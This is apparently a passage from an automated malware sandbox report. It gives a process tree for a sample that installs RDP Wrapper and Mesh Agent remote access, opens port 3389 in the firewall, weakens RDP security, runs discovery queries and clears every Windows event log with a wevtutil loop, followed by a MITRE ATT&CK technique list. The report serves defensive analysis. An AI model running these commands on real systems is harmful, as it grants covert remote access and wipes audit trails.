      C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
      4⤵
      PID:5016
    - - C:\Windows\system32\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        5⤵
        
        PID:3036
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
      4⤵
      PID:1916
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4528
  - - C:\Windows\system32\PING.EXE
      ping -n 1 google.com
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:3636
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        5⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:1696
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3336
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3096
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      PID:4332
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3704
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
      4⤵
      PID:944
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
      4⤵
      PID:448
  - - C:\Windows\system32\findstr.exe
      findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
      4⤵
      PID:1488
- C:\Windows\system32\cmd.exe
  cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
  2⤵
  PID:1568

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4384
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4772
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:3960
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1728
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4600

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3516
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1904
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4508
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1484
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2468
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:2468

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2888
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4068
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3528
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2452
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:1944
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3328

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1868

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3648

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:2156
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3084
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1080
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4532
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1480
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2020

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1780

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:456
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3472
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:452
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3840
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:5116
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3360

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:3796
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4792
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3632
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:468
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1120
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3116

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2960
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3480
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:1080
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3632
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:468
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:5052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5072

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3576
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5068
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:4672
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1908
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4968
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4600

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4460
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4220
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1440
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4448
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1456
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:4792

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:3960
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3904
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4092
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:3332
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1092
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1248
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:1740

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1324
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:452
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4124
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1396
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1636
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:2288
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2004

C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1180
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4928
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - System Location Discovery: System Language Discovery
  PID:972
- C:\Windows\SysWOW64\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry